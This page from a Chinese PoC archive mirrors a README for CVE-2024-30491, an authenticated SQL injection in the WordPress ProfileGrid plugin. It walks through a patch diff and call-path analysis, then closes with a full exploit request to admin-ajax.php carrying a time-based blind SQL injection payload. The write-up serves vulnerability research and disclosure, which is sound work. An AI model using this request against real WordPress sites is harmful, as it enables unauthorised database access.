支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 58ccf2cb3b2a2d23118c4bfe848c73e7b9d1edfc

来源
https://github.com/truonghuuphuc/CVE-2024-30491-Poc
关联漏洞
标题:WordPress Plugin ProfileGrid SQL注入漏洞 (CVE-2024-30491)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin ProfileGrid 存在SQL注入漏洞,该漏洞源于存在 SQL 注入漏洞。
介绍
# CVE-2024-30491-Poc
## ProfileGrid <= 5.7.8 - Authenticated (Subscriber+) SQL Injection

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profilegrid-user-profiles-groups-and-communities/profilegrid-578-authenticated-subscriber-sql-injection

Build wordpress: ```docker-compose -f stack.yml up```

Step 1: Diff ProfileGrid 5.7.8 and ProfileGrid 5.7.9
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/644fb3c9-df32-40e6-910f-24ce69218595)
File: includes\class-profile-magic-dbhandler.php => function get_all_result change in variable $additional
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/6d372af1-1558-439b-9263-df5052cf63f3)
Check function pm_filter_addtional_query_parameter in file includes\class-profile-magic-dbhandler.php (ProfileGrid 5.7.9) it seems to check for keywords that are capable of sql injection
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/4a6e697e-b617-4744-991d-658d68ca740f)

Step2: Focus plugin ProfileGrid 5.7.8 . I search for functions that call the function get_all_result.
I found function pm_messenger_search_threads in file includes\class-profile-magic-chat-system.php call function get_all_result.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/c6ab397e-d4e9-4551-aabb-4fa7816550c3)

Step3: I search for functions that call the function pm_messenger_search_threads

File: public\class-profile-magic-public.php function pg_search_threads call function pm_messenger_search_threads
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/87e303d7-095b-42ce-949f-f59613159a98)

Step4: 
File: includes\class-profile-magic.php
I found registering an action and hook name `wp_ajax_pg_search_threads`. When this hook is run, the `pg_search threads` function is called to process the request and return the results.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/990ee72d-c168-46c6-b350-932152419b96)

Exploit:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Cookie: {{Cookie}}
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

action=pg_search_threads&search='+and+sleep(if(1=1,5,0))--+-

```


https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/591033b5-94cd-4bf2-966e-b28c2bd592f5
文件快照

 [4.0K]  /data/pocs/58ccf2cb3b2a2d23118c4bfe848c73e7b9d1edfc
├── [ 12M]  profilegrid-user-profiles-groups-and-communities.5.7.8.zip
├── [ 12M]  profilegrid-user-profiles-groups-and-communities.5.7.9.zip
├── [2.5K]  README.md
└── [ 607]  stack.yml

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。